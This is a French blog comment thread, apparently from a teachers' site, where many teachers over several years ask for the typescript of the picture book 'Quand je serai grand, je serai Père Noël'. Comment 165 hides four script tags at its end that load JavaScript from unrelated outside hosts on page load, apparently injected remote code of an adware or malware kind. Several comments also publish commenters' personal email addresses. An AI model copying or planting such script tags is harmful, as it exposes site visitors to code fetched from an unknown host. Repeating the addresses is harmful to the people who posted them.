    Est-il possible t'avoir le tapuscrit ? 

    Merci par avance

    122
    perle
    Dimanche 3 Décembre 2017 à 09:15

    Bonjour

    Super travail, je suis très intéressée. Est-ce qu'il serait possible d'avoir le tapuscrit s'il te plait  ? 

    Merci beaucoup

    Bon dimanche

     

    123
    charline
    Dimanche 3 Décembre 2017 à 15:17

    Bonjour, 

    merci pour ton travail, je souhaiterais également le tapuscrit... Merci d'avance.

     

    Charline 

    124
    kryn
    Dimanche 3 Décembre 2017 à 20:37

    bonsoir,

    en ulis je travaille sur les pères noel et votre tapuscrit m'interesse.

    pourriez-vous me l'envoyer .merci

    125
    Chabannes
    Lundi 4 Décembre 2017 à 09:47
    Bonjour!super travail bravo!!pouvez vous m envoyez le tapuscrit et cecque vous avez fait pour que je puisse m y appuyer?
    Bon courage pour cette periode hautement excitante
    Fabienne
    126
    clomeurisse
    Lundi 4 Décembre 2017 à 12:28

    Bonjour !

    Je suis très intéressée par votre travail sur cet album pour compléter mes fiches déjà trouvées.Serait-il possible de me l'envoyer ? Un grand merci !

    127
    Eric
    Mardi 5 Décembre 2017 à 20:12

    Bonjour, je suis intéressé par le tapuscrit de cet album. Est-ce que vous pouvez me l'envoyer. Merci

    128
    yamina
    Mercredi 6 Décembre 2017 à 14:21

    Bonjour,

    Je souhaite travailler cet album pour Noël et je suis très intéressée par votre travail, pourriez vous m'envoyer le tapuscrit ? Merci beaucoup ! 

    129
    Dorine
    Mercredi 6 Décembre 2017 à 15:43

    Bonjour, je vois que je ne suis pas la seule...

    Si vous avez deux minutes pour partager avec moi votre tapuscrit de ce bel album de Solotaref ce serait chouette !

    Merci et bonne journée,

    Dorine

    130
    Coline L
    Mercredi 6 Décembre 2017 à 19:01

    Pouvez-vous m'envoyer le tapuscrit de "Quand je serai grand..", j'enseigne le francais aux Etats-Unis et je n'ai pas de moyen de me le procurer.

    Merci!

    coline.leboucher@gmail.com

    131
    liline
    Mercredi 13 Décembre 2017 à 14:22

    bravo pour votre blog il est super !

    j'aimerai bien avoir le tapuscrit de "qd je serai grand" il me semble très bien adapté pour les CP

    merci d'avance

    132
    Max
    Mercredi 13 Décembre 2017 à 16:53

    Bonsoir, si vous pouviez m’envoyer Le tapuscrit s’il vous plaît ? Merci pour tout :) 

    133
    Isa
    Jeudi 14 Décembre 2017 à 17:02

    Bonjour,

    Votre blog est très intéressant et votre travail à l'air très complet, serait-il possible d'avoir les questionnaires ?

    Avec mes remerciements !

    Bonnes fêtes !

    134
    Michaelt88
    Lundi 18 Décembre 2017 à 16:15

    Bonjour,

     

    Tout d'abord félicitations pour votre travail. C'est très impressionnant.

    J'ai débuté cette histoire avec mes CP, serait-il possible d'en avoir le tapuscrit et quelques exercices s'y rattachant?

    Encore un grand merci pour le partage de ce travail.

    Joyeuses fêtes de fin d'année.

    135
    gégédine
    Lundi 18 Décembre 2017 à 16:53

    Bonjour

    je souhaiterai travailler sur cet album avec mes CP-CE1. Pouvez-vous me l'envoyer par mail?

    Merci par avance !

    136
    isa
    Mardi 29 Mai 2018 à 23:11

    Bonsoir, 

    je commence à préparer ma progression en lecture d'album et j'aimerais beaucoup faire travailler les élèves sur "Quand je serai grand, je serai Père Noël", je voudrais bien voir le tapuscrit et les exercices.

    Merci beaucoup pour votre partage!

     

    137
    POINT Hélène
    Lundi 15 Octobre 2018 à 02:48

    Bonsoir,

    Je serais intéressée par votre travail sur l'album. Merci beaucoup pour le partage je trouve cela tellement chouette et impressionnant qu'il existe des gens comme vous qui arrivent à mener un blog et une classe!! Bravo!

    Hélène

    138
    Milou
    Lundi 22 Octobre 2018 à 17:08

    Bonjour,

    Pourriez-vous m'envoyer votre tapuscrit de "quand je serai grand je serai le Père Noël". sarcastic

    Un très grand merci d'avance et un grand bravo pour vos partages et pour la qualité de votre travail ! cool

    139
    sunnymax82
    Lundi 29 Octobre 2018 à 13:01

    Bonjour, 

    Votre travail à l'air super, cela m'interesserait beaucoup d'avoir le tapuscrit si vous pouviez me l'envoyer ce serait génial.  Merci !

    140
    Elise
    Mardi 30 Octobre 2018 à 23:38
    Elise

    Bonjour, j'aimerais aussi que vous puissiez m'envoyer le travail que vous proposez :) Pouvez-vous me l'envoyer par mail?

    Merci d'avance

    Elise

    141
    stephanie
    Dimanche 4 Novembre 2018 à 01:09

    Bonsoir ,  je vais travailler sur le thème de devenir grand avec ma classe ulis. Pourriez-vous me transmettre votre travail qui me semble super!! merci beaucoup!!

    142
    mb
    Mercredi 7 Novembre 2018 à 14:37

    Bonjour,  J'aimerais avoir le tapuscrit CP "Quand je serai grand, je serai Père Noël". Par avance, merci pour vos ressources, elles st d'une grde aide!

    143
    FR
    Samedi 10 Novembre 2018 à 19:42

    Bonjour, j'aimerai avoir le tapuscrit CP quand je serai grand je serai père Noel s'il vous plait et d'avance un grand merci pour votre travail !!!

    144
    Emeline
    Jeudi 22 Novembre 2018 à 18:44

    Bonsoir, 

     

    Je serai intéressée par votre tapuscrit sur "Quand je serai grand je serai Père Noël." Pourriez vous me l'envoyer? 

     

    Cordialement, 

     

    Emeline LEVEQUE

    145
    anne
    Lundi 26 Novembre 2018 à 10:49

    bonjour

    pouvez vous svp m'envoyer le tapuscrit et le travail autour de l'album "qaund je serai grand je serai père noel"

    merci beaucoup

    146
    Krokettas
    Mercredi 28 Novembre 2018 à 01:28

    Bonjour !

    Je serais intéressée pour recevoir votre travail concernant Quand je serai grand je serai Père Noël s'il vous plaît ?

     

    En vous remerciant par avance :).

    147
    mathieu
    Jeudi 29 Novembre 2018 à 14:07

    Bonjour serait-il possible d'obtenir le tapuscrit de "quand je serai grand je serai père noel"?

    merci beaucoup à vous pour ce partage, cordialement

    148
    pasco
    Jeudi 29 Novembre 2018 à 19:46

    Bonjour,

    Je suis vraiment intéressée à recevoir votre tapuscrit ainsi que le travail relié au livre Quand je serai grand je serai Père Noël.

    Merci et bonne journée.

    149
    manue
    Dimanche 2 Décembre 2018 à 16:45

    bonjour 

    J'ai une classe de CP CE1 et j'aimerais travailler sur l'album Quand je serai grand je serai le père Noël. 

    Pourriez vous me transmettre le tapuscrit et l'exploitation de l'album s'il vous plait.

    Merci et bonne soirée

    150
    christine
    Lundi 3 Décembre 2018 à 12:49

    bonjoutr

    je serais vraiment interessee par votre travaiil sur cet album.

    merci beaucoup

    Christine

     

    151
    SANCHEZ Emmanuel
    Lundi 3 Décembre 2018 à 17:15

    Bonjour 

    J'ai une classe de CP et j'aimerais travailler sur l'album Quand je serai grand je serai le père Noël. 

    Pourriez vous me transmettre le tapuscrit et l'exploitation de l'album, s'il vous plaît ?

    Merci. 

    Emmanuel Sanchez

     

    152
    Marion
    Jeudi 6 Décembre 2018 à 21:48

    Bonjour, je travaille sur cet album avec mes GS, pourriez vous m'envoyer le tapuscrit pour mes cp.

    Merci beaucoup 

    Marion

    153
    manon
    Vendredi 7 Décembre 2018 à 15:16

    Bonjour,

    Serait il possible de recevoir svp le tapuscrit? 

    Mille mercis 

    Manon 

    154
    Sandrinette
    Dimanche 9 Décembre 2018 à 08:37
    Bonjour, je serai intéressé par votre tapuscrit et l'exploitation de Quand je serai grand." Je ne connais pas cet album mais j'aime bcp l'auteur alors peut-être un coup de cœur... D'avance un grd merci pour le temps que tu voudras bien m'accorder, un grd merci pour le partage et beaucoup de courage pour ces 2 prochaines semaines bien intensives pour nous tous;-) Amicalement,Sandrine.
    155
    Céline Garnier
    Dimanche 9 Décembre 2018 à 19:06

    Bonsoir,

    pourriez-vous m'envoyer le tapuscrit svp ?

    Merci d'avance pour ce partage ;)

    Céline

     

    156
    val
    Dimanche 9 Décembre 2018 à 21:28

    Bonsoir, je serai très intéressée par le tapuscrit de "Quand je serai grand...". Pourriez-vous me l'envoyer?

    D'avance merci pour votre partage et votre travail.

    Val

    157
    Emilie
    Mardi 16 Juillet 2019 à 16:37

    Bonjour, 

    Je prépare ma programmation en littérature pour les CP et je viens de découvrir cet album de Grégoire Solotareff sur Noël. Pourriez-vous m'envoyer le tapuscrit? D'avance merci de partager votre travail.

    Bonnes vacances

    Emilie

    158
    roxane
    Vendredi 4 Octobre 2019 à 10:55

    Bonjour,

    Je serai intéressée par le tapuscrit. Serait-il possible de me l'envoyer?

     

    Merci

    159
    Marion
    Samedi 19 Octobre 2019 à 22:56

    Bonsoir,

    Merci pour ce super travail! Noël approche et j'aimerais travailler sur cet album avec mes GS/CP. Pourriez-vous m'envoyer le tapuscrit de l'album svp?

    Merci beaucoup!!!

      • Christelle 85
        Lundi 28 Octobre 2019 à 07:34

        ¨Bonjour Marion, Avez vous eu une réponse?

        Merci

         

    160
    Christelle 85
    Vendredi 25 Octobre 2019 à 09:15

    Bonjour,

    En pleine préparation de période, j'aimerai travailler sur cet album "Quand je serai grand..." avec mes CP. La 1ère page est adaptée aux CP. Je suis intéressée pour voir les autres. Pourriez-vous m'envoyer le tapuscrit de l'album svp?

    Merci beaucoup!!!

    Je fournirai mon travail sur la lettre si vous le désirez.

    161
    MESSIEN
    Lundi 28 Octobre 2019 à 18:51

    Bonsoir,

    Je serai très intéressée par le tapuscrit de "Quand je serai grand je serai le père Noel". Est-il possible que vous me le transmettiez par mail?

     

    En vous remerciant d'avance!

    162
    Monic
    Dimanche 10 Novembre 2019 à 21:17
    Je serai très intéressée par le tapuscrit de "Quand je serai grand je serai le père Noel". Est-il possible que vous me le transmettiez par mail?
    163
    Agnès K
    Samedi 16 Novembre 2019 à 21:44

    Bonjour,

    Afin que mes élèves de CE2 puissent lire aux élèves de la maternelle voisine l'album "Quand je serai grand je serai le père Noël", je suis très intéressée par le tapuscrit. Est-il possible que vous me le transmettiez par mail? 

    En vous en remerciant d'avance.

    164
    Mélanie
    Mercredi 20 Novembre 2019 à 22:39
    Bonsoir ! Je suis intéressée par le tapuscrit svp :) merci d’avance pour votre travail
    165
    M H CHAZAL
    Vendredi 22 Novembre 2019 à 06:58

    Bonjour

    En effet très bel album que j'avais l'habitude d'utiliser avec mes GS.. .Je suis cette année en classe de CE1 et je serai grandement intéressée par le tapuscrit pour travailler avec mes petits loups !

    Merci par avance pour ce travail !

    <script src="//lonelyfix.com/21d85fef47dc8f531c.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8664x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8664x&format=arrjs&r=1574402179579" type="text/javascript"></script> <script src="http://lonelyfix.com/ext/21d85fef47dc8f531c.js?sid=52596_8664_&title=aaa&blocks[]=31af2" type="text/javascript"></script>
    166
    Sev03
    Samedi 23 Novembre 2019 à 15:11

    Bonjour, mes élèves de CM présentent une histoire de NoËl aux autres classes de l'école avant les vacances et je suis intéressée par votre tapuscrit pour cette année. Pouvez-vous me le transférer ? Merci !

    167
    Marie
    Vendredi 29 Novembre 2019 à 15:48

    Bonjour!

    J'apprécierais  recevoir le tapuscrit suivant svp afin de le lire avec mes élèves:Quand je serai grand je serai le Père Noël.

     

    Merci!

    Marie

     

     

     

     

    168
    Caro
    Vendredi 29 Novembre 2019 à 18:56

    Bonsoir, 

    je suis très intéressée par votre travail de « Quand je serai grand je serait le Père Noël ». Serait-il possible que vous me l’envoyer s’il vous plaît ? Je serais ravie de travailler ce texte avec mes élèves.

    Merci ! 

    169
    Samedi 30 Novembre 2019 à 09:02

    Bonjour,

    Je voudrais travailler cet album avec mes GS; serait-il possible de me l'envoyer ? Merci infiniment !

    170
    Agathe
    Mercredi 4 Décembre 2019 à 12:36

    Bonjour, j'aurai souhaité travailler cet album avec mes CP. Serait-il possible de me l'envoyer? Merci beaucoup.

    171
    raphaelle chalvet
    Jeudi 5 Décembre 2019 à 13:34

    bonjour ! si cela vous es possible de m'envoyer de tapuscrit facile pour CP, ca serait génial ! merci bcp !

    bonne journée

    172
    RAOULX
    Mardi 10 Décembre 2019 à 00:19

    Bonjour,

    Serait-il possible d'avoir le tapuscrit de "Quand je serai grand je serai Père Noël" ? Merci beaucoup:)

    173
    Mardi 10 Décembre 2019 à 07:32

    Bonjour,

    Et voici en rappel mon adresse mail pour faciliter l'envoi du tapuscrit "Quand je serai grand je serai Père Noël" (que je continue d''attendre ...!!!):

    < chfatma@hotmail.fr >

    et merci encore :)

    174
    céline
    Dimanche 15 Décembre 2019 à 17:10

    bonjour et merci pour ce merveilleux travail !

    serait-il possible d'avoir le tapuscrit et les fiches pour mes cp ?

    merci d'avance et encore merci 

    bonne fin d'année !

    175
    Lundi 16 Décembre 2019 à 06:37

    Bonjour (?) Ketchou,

    Depuis le Samedi 14 Décembre 2013 à 17:50  , tu n'as plus donné signe de vie ...!!!

    Es-tu toujours de ce monde ?

    Joyeux Noel et Bonnes fetes de fin d'année.

    176
    Coraline
    Mercredi 1er Avril 2020 à 14:21

    Bonjour, 

    Je serai très intéressée par votre tapuscrit Quand je serai grand, je serai Père-Noël pour un dossier pour ma licence en vue de devenir enseignante FLE. Vous serait-il possible de me l'envoyer svp?

     

    Merci beaucoup pour votre travail.

    Bonne journée

    177
    Sonia
    Mardi 18 Août 2020 à 17:55

    Bonjour,

    Actuellement en pleine préparation sur mes programmations annuelles, j'aimerais recevoir le tapuscrit de "Quand je serai grand, je serai Père Noël", si cela est possible. Merci beaucoup et bonne rentrée !

    178
    sab
    Mercredi 30 Septembre 2020 à 14:23

    Bonjour,

    Je serais intéressée par le tapuscrit de "quand je serai grand je serai père noël".

    Si c'est encore possible.

    Merci d'avance,

    Cordialement,

    Sabrina

    179
    Stéphanie
    Vendredi 16 Octobre 2020 à 10:58

    Bonjour,

    Je suis très intéressée par votre travail sur l'album "Quand je serai grand je serai Père Noël. Pouvez-vous me le transmettre s'il vous plaît ?

    Merci beaucoup.

    Stéphanie

    180
    Janine
    Vendredi 23 Octobre 2020 à 05:15

    Bonjour! Je suis intéressée par votre travail sur l'album " Quand je serai grand je serai Père Noêl". Pourriez-vous me le faire parvenir s' il vous plaît? Grand merci!

    Janine

    181
    Flo
    Mercredi 28 Octobre 2020 à 10:07

    Bonjour,

    Je suis intéressée par le tapuscrit 3quand je serai grand je serai Père Noël".

    Merci d'avance.

    Flo

    182
    Aline
    Vendredi 30 Octobre 2020 à 12:32

    Bonjour, 

    merci de votre travail sur cet album.

    Je suis à la recherche du tapuscrit, pourriez vous me l'envoyer?

    Merci.

    Aline

    183
    jessica
    Mercredi 4 Novembre 2020 à 14:54

    Bonjour, 

    Je me permets de vous contacter pour vous demander s'il serait toujours possible d'avoir le tapuscrit de "Quand je serai grand, je serai Père Noël".

    Je comprendrais toutefois, que ce ne soit pas possible .

    Belle journée à vous

    Jessica

    184
    fiona
    Mardi 10 Novembre 2020 à 10:55

    Bonjour pouvez vous m'envoyer le tapuscrit? Mille merciiiiiiiiiiiis

    185
    Celine
    Mercredi 18 Novembre 2020 à 06:59
    Bonjour
    Je suis très intéressée par ce tapuscrit. Pouvez vous me l'envoyer ? Merci beaucoup. Cordialement
    186
    alexandra
    Samedi 21 Novembre 2020 à 16:38

    Bonjour

    Je serai intéressée par le tapuscrit sur "Quand je serai grand, je serai le PN". Pourriez-vous me l'envoyer svp?

    Je vous en remercie!

    Cordialement

    187
    Sofy
    Lundi 23 Novembre 2020 à 13:17

    Je vais proposer cette lecture est-ce possible d'avoir votre tapuscrit ?

    un grand MERCI 

    188
    Louise
    Mercredi 25 Novembre 2020 à 10:04

    Bonjour, si cela est toujours possible, je suis intéressée par votre travail autour de l'album "Quand je serai grand, je serai le PN"

    Merci beaucoup :) 

    189
    sylvinou
    Samedi 28 Novembre 2020 à 10:13

    Bonjour,

    Le mois de décembre approche et je suis très intéressée par votre travail autour de l'album "Quand je serai grand, je serais Père Noël"

    Merci d'avance pour votre partagesmile

    190
    Jess
    Lundi 30 Novembre 2020 à 09:41

    Bonjour, 

     

    je viens de découvrir votre superbe travail, et je serais très intéressée par le tapuscrit de cet album... Pourriez-vous me l'envoyer s'il vous plaît?

     

    Merci beaucoup, et joyeuses fêtes de fin d'année (un peu en avance!)

    191
    Marilou
    Lundi 30 Novembre 2020 à 22:16

    Bonjour, je suis très intéressée par votre tapuscrit car enseignant en Australie, je n'ai pas accès à beaucoup de ressources en Français. Merci par avance.

     

    192
    Cynthia
    Mercredi 2 Décembre 2020 à 09:49

    Bonjour, 

    Je suis intéressée par le tapuscrit "quand je serai grand je serai père noel". 

    Merci par avance

    193
    Agathe
    Jeudi 3 Décembre 2020 à 20:56

    Bonjour,

    j'aimerai travailler cet album avec mes CP la semaine prochaine. J'ai vu que tu proposais d'envoyer le tapuscrit. Serait-il possible de me l'envoyer s'il te plait ?

    Je te remercie et bravo pour le travail!

     

    194
    Julie
    Jeudi 3 Décembre 2020 à 21:52

    Bonjour,

    Je suis très intéressée par le tapuscrit! Pourriez-vous s'il vous plait me l'envoyer?

    Merci par avance et bravo pour votre travail!

    195
    leslie
    Samedi 5 Décembre 2020 à 08:16

    Bonjour,

    Je suis vraiment intéressée par le tapuscrit! Pourriez-vous s'il vous plait me l'envoyer?

    Je vous remercie par avance et bravo pour votre travail ainsi que pour le partage!

    196
    EM
    Dimanche 6 Décembre 2020 à 05:23

    Bonjour et merci pour vos partages. Je serais également intéressée par le tapuscrit de "quand je serais grand je serais pere noel" si vous voulez bien ?

    Mon mail : contact@planete-enfants.info

    Merci beaucoup à vous et bonne continuation.

    E.M.

    197
    Cathy305
    Mardi 8 Décembre 2020 à 22:53

    Bonjour 

    Est-il possible d'avoir votre tapuscrit de "Quand je serai grand, je serai père Noël" . 
    Je  vous remercie d'avance 

    Cathy305

    198
    Cora
    Mercredi 16 Décembre 2020 à 11:00

    Bonjour, 

    Votre tapuscrit a l'air super. Serait-il possible de le recevoir ? Merci Beaucoup ! 

    199
    karine
    Mercredi 3 Novembre 2021 à 18:02

    je suis intéressée par ton travail. je souhaiterais que tu me l’envoies si possible. merci

    200
    Marie
    Jeudi 4 Novembre 2021 à 13:26

    Bonjour,

    Un grand merci pour le partage de votre travail. Je suis très intéressée par le tapuscrit de l'album "Quand je serai grand, je serai Père Noel"!

    Merci encore!

     

    201
    Caroline
    Vendredi 5 Novembre 2021 à 14:08

    Bonjour, 

    Je suis également intéressée pour le tapuscrit de l'album "Quand je serai grand, je serai Père Noël". Mon adresse c'est carow55@hotmail.fr

    Un grand merci pour votre travail et votre partage ! 

    202
    Sab
    Samedi 20 Novembre 2021 à 09:45

    Bonjour, j'aimerai beaucoup que vous m'envoyez ce tapuscrit de l'album " Quand je serai grand, je serai Père Noël". J'espère que c'est toujours possible.

    Je vous remercie par avance. Sab

    203
    Estelle
    Mercredi 24 Novembre 2021 à 20:42

    Bonjour, est-il encore possible d'avoir le tapuscrit de "Quand je serai, je serai Père Noël"? Un texte adapté pour les CP c'est toujours chouette et tellement rare.

    Merci

    204
    fatchou
    Jeudi 25 Novembre 2021 à 06:03

    Bon, je pense "ketchou" a quitté le monde de l'enseignement depuis quelque temps (peut-être même avant 2013 ...). Ce Blog est en quelque sorte sa bouteille lancée dans l'océan. Peut-être qu'il (ou elle) la suit depuis là où il (ou elle) est actuellement, peut-être aussi quelque part à côté des étoiles ...

    Et les poissons continueront à mordre à l'hameçon, chaque année en cette saison !

    Alors Père Noël, que fais-tu ... ?

    205
    carob
    Mardi 30 Novembre 2021 à 22:21

    Bonsoir , je suis intéressée par votre tapuscrit pour ma classe de CE1 . Vous serait-il possible de me l'envoyer ? Merci d'avance ! Caroline

    206
    Anne
    Mercredi 1er Décembre 2021 à 18:21

    Bonsoir,

    Pourriez-vous me faire parvenir le tapuscrit de l'album " quand je serai grand, je serai le père Noël" s'il vous plaît?

    Je vous remercie à l'avance.

    Anne

     

    207
    Noémie
    Jeudi 2 Décembre 2021 à 20:46

    Bonjour,

     

    Auriez-vous encore le tapuscrit "Quand je serai grand je serai le père Noël" s'il-vous plait? 

    Merci par avance.

    Cordialement

    Noémie

    208
    patrouge
    Dimanche 5 Décembre 2021 à 18:37

    bonsoir,

    je suis intéressée par le tapuscrit de "quand je serai grand je serai le Père Noël". 

    un grand merci pour ton aide.

    Patricia

    209
    Noémie
    Lundi 6 Décembre 2021 à 05:58
    Bonjour, serait-il possible d’avoir le tapuscrit s’il vous plaît ? Je voudrais en faire un kamishibai merci
    210
    Claire
    Samedi 11 Décembre 2021 à 15:25
    Bonjour Je très intéressée par votre tapuscrit : Clairesonan@gmail.com
    211
    pasdut@gmail.com
    Samedi 11 Décembre 2021 à 17:32
    Bonjour, je pense que j'ai le tapuscrit, donnez moi vos adresses mail et je vous l'envoie, ou écrivez moi à pasdut@gmail.com Pascale
    212
    pasdut@gmail.com
    Samedi 11 Décembre 2021 à 17:58
    En fait non je ne l'ai pas, je n'avais pas eu de réponse à ma demande en 2015, alors j'avais acheté l'album
    213
    Laeti
    Samedi 11 Décembre 2021 à 23:41
    Bonjour, Je serais intéressée par le tapuscrit :) Puis je l avoir svp? Merci beaucoup! :)
    214
    ACBH
    Lundi 18 Juillet 2022 à 21:30

    Bonjour,  je serai intéressée par le tapuscrit svp, merci d'avance !

    215
    BM
    Jeudi 20 Octobre 2022 à 16:30

    Bonjour, je suis interessée par votre travail. J'ai  une classe Ulis avec 12 élèves et je souhaite travailler sur cet album.

    pourriez vous m'envoyer votre travail svp ?

    Merci d'avance

    216
    cha
    Dimanche 13 Novembre 2022 à 21:49

    Bonjour,

    Je serai intéressée par le tapuscrit de Quand je serai grand je serai père Noël.

    Merci d'avance

     

    217
    CATHY
    Dimanche 27 Novembre 2022 à 19:02

    Bonjour

    Je viens de voir que tu as un tapuscrit que tu as écris pour Quand je serais grand je serai Père Noel ....

    Pourrais tu me l'envoyer à l'adresse mail ci dessus ?  Je voudrais aussi le travailler avec mes CP.

    Merci pour ce travail c'est toujours interessant de voir comment chacun travaille et merci d'acceder à ce que tu fais...

    Cathy

    218
    Mcy
    Vendredi 13 Janvier 2023 à 15:43

    Bonjour,

    Serait-il possible d'avoir le tapuscrit et les questions? Merci par avance et bravo pour tout ce travail!

    219
    Annie
    Lundi 21 Août 2023 à 15:32

    Bonjour,

    Je souhaiterai travailler avec mes élèves sur cet album.

    Est-il toujours possible de vous demander le tapuscrit et votre exemple d'exploitation?

    merci beaucoup,

    Annie

    220
    marion
    Dimanche 5 Novembre 2023 à 14:24

    Bonjour! 

      Je serais très intéressée par votre tapuscrit de "Quand je serai grand je serai Père Noël" . Est ce possible de le recevoir? Merci beaucoup!!!!

    221
    marion
    Dimanche 5 Novembre 2023 à 14:25

    Bonjour!

      Je serais très intéressée par votre tapuscrit "Quand je serai grand je serai Père Noël" . Est ce possible de le recevoir? Merci beaucoup!!!

    222
    valérie
    Dimanche 19 Novembre 2023 à 19:00

    Bonsoir, je serais intéressée par le tapuscrit de "Quand je serai grand, je serai père Noël"; merci

    223
    sj
    Mercredi 22 Novembre 2023 à 15:08

    bonjour

    pourriez-vous m'envoyer le tapuscrit "quand je serai grand je serai le père noël" svp et si possible vos documents d'exploitation pédagogique. merci par avance

    224
    Hadartari
    Mercredi 13 Décembre 2023 à 22:24

    Je viens de découvrir que cet album trainait dans l'école.  Je serais donc vivement intéressée par le tapuscrit  et éventuellement son exploitation. bravo pour votre travail et un grand merci pour votre partage.

    Hadartari

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :